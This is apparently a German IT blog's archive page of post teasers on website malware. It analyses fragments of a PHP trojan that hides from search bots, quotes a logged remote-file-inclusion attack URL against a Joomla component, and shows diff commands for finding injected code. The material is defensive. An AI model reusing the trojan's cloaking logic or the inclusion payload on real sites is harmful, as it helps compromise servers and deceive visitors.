Artikel-Schlagworte: „Virus“
PHP Trojaner von adveconfirm.com
18.03.2012 | 
Ich habe diverse Webseiten von einem Kollegen auf einen meiner Server verschiebt. Dabei waren plötzlich diverse Seiten von einer Ladezeit von 20 Sekunden betroffen. Also habe ich ein Blick in den Source riskiert und folgenden Code gefunden, wo ich zerstückelt hier analysiere:
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;Zuerst schaut der Code, ob er bereits einmal aufgeführt wurde, wenn nicht, startet er sich selbst, sonst lässt er es.
So führt sich der Code nur einmal aus.
// This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = "";
Der Code ist kommentiert 
Nett. Laut Kommentar erstellt es Statistiken von Bots.
if((strstr($sUserAgent, 'google') == false) // Bot comes
&& (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false)
&& (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false)
&& (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false)
&& (strstr($sUserAgent, 'bot') == false) && (strstr($sUserAgent, 'yahoo') == false))
{Laut Kommentar, wenn ein Bot kommt, aber die Funktion macht das Gegenteil, wenn kein Bot kommt, also ein normaler User (keine opera und safari User)…
Diesen Beitrag weiterlesen »
Unixbefehle Diff und Patch / PHP Trojaner zufällig finden
Immer wieder gibt es Gründe, warum man sich einem Webserver bemächtigen möchte. In letzter Zeit sind PHP Trojaner sehr populär geworden.
Es erfordert nur ein unglaublich kleinen Code und kann in einem beliebigen PHP File versteckt werden.
Virenscanner und Anti-Rootits haben keine Chance sie zu finden und der User selbst muss manuell ans Werk.
Der Nutzungsbereich ist gross. Ich habe mal über ein JS:Redirect Trojaner (DE / EN) geschrieben, welcher mit einem infizierten PHP File auf den Server gebracht wurde.
Nun musste ich gestern bei einem Fremden Server ein OSCommerce neu installieren. Da sie aber auch selber Änderungen am Code machten, musste ich die Differenz rausfinden.
Also liess ich ein
diff -r /var/www/1 /var/www/2 > directories.diff
laufen. So erhalte ich welche Files nicht identisch sind und auch ob neue angelegt wurden.
Aus der Liste entnimmt man alle PHP Files und lässt sie über ein weiteren Vergleich:
diff -u /var/www/1/functions.php /var/www/2/functions.php >> changes.diff
Dann erhält man etwas wie das hier:
--- /var/www/1/functions.php 2010-09-07 11:08:55.000000000 +0200
+++ /var/www/2/functions.php 2010-09-07 11:27:18.000000000 +0200
@@ -81,6 +81,7 @@
define('BOX_HEADING_CUSTOMERS', 'Kunden');
define('BOX_CUSTOMERS_CUSTOMERS', 'Kunden');
define('BOX_CUSTOMERS_ORDERS', 'Bestellungen');
+define('BOX_CUSTOMERS_USERLEVEL', 'Userberechtigungen');
define('BOX_HEADING_LOCATION_AND_TAXES', 'Land / Steuer');
@@ -182,6 +183,10 @@
define('ENTRY_NEWSLETTER', 'Rundschreiben:');
define('ENTRY_NEWSLETTER_YES', 'abonniert');
-define('ENTRY_NEWSLETTER_NO', 'nicht abonniert');
+define('ENTRY_USERLEVEL', 'Userlevel:');
+define('ENTRY_RABATT_USER', 'User:');
+define('ENTRY_RABATT_HAENDLER', 'Händler:');
+define('ENTRY_RABATT_PREMIUM', 'Premium:');
Die @@ Linie zeigt dem Programm bei welcher Linie diese Änderungen sein sollten. Die + Linien sind neu hinzugekommen und alle – Linien gehören weg. Alle Linien ohne Angabe dienen zur Hilfe bei der Navigation. Will man die Änderungen in einer zukünftigen Version einspielen und die Linienangaben ändern sich, hat das Programm daher die Hilfsangabe und findet die richtige Stelle trotzdem.
Einspielen kann man im übrigen mit
patch -p1 < changes.diff
Nachdem ich dies ausgeführt hatte, sah ich ein recht seltsamer Codeschnippsel. Nach dem Auseinanderbeinen (Enter und Tabs einfügen) sah ich ich vor mir ein Trojaner, dieser so aus:
Diesen Beitrag weiterlesen »
Veröffentlicht in Internet, Programme, Server, Sicherheit | 
Schlagworte: Linux, Malware, PHP, Sicherheit, VirusEigene Webseiten scannen
Infizierte Webseiten können einem den letzten Nerv rauben. Wie stellt man aber sicher, dass nicht doch Irgendwer Malware auf die eigene Webseite eingeschleust hat.
Am schnellsten kontrolliert man die eigene Webseite über sogenannte Security Scanner, welche speziell für Webseiten entwickelt wurden.
Gerne stelle ich hier die bekanntesten Dienste vor:
Diesen Beitrag weiterlesen »
Ich nutze WordPress nicht Joomla
Wie der Titel es schon sagt, ich benutze WordPress und nicht Joomla. Vermutlich müsste ich dies auf Englisch schreiben, damit es auch die hinterletzten “Personen” lesen und verstehen können.
Aber nun dämmert es mir, das sind ja Scripte und die können nicht lesen.
Das Joomla eines der unsichersten CMS Systemen ist, habe ich schon Sicherheit von Open CMS Systemen (Joomla Bugs), wo ich die veröffentlichten Bugs von 10 Tagen präsentierte.
27 Sicherheitslücken war das Resümee. Leider waren dies keine speziellen 10 Tage, sondern Tagesgeschäft bei Joomla.
Immer wieder fällt mir auf, wie versucht wird mein netter Blog anzugreifen. In dem Log bleiben selbstverständlich die Spuren zurück, wie:
/administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path=http://*****/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??
Einfach mal aus Lust und Laune schaute ich den letzten Monat an und machte eine Liste wobei pro Angreifer nur 1 Zeile Diesen Beitrag weiterlesen »
Batterieladegerät versteckte 3 Jahre lang ein Trojaner
Es gibt heute viele Produkte die an ein USB Anschluss angesteckt werden können, auch wenn sie mit dem PC nichts zu tun haben.
Ob ein USB Fentilator, USB Sockenwärmer oder sonstige Gadgets, so gibt es auch ein USB Ladegerät um Batterien aufzuladen.
Bei dem abgebildeten Energizer Batterieladegerät wurde ein Trojaner mitliefert. Da normalerweise ein Batterieladegerät nur Strom vom USB bezieht, kam niemand auf die Idee dies zu kontrollieren.
Nun nach 3 Jahren wurde endlich Diesen Beitrag weiterlesen »
 Kontaktdaten | IT Blögg? Ein männlicher IT Nerd durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf. + |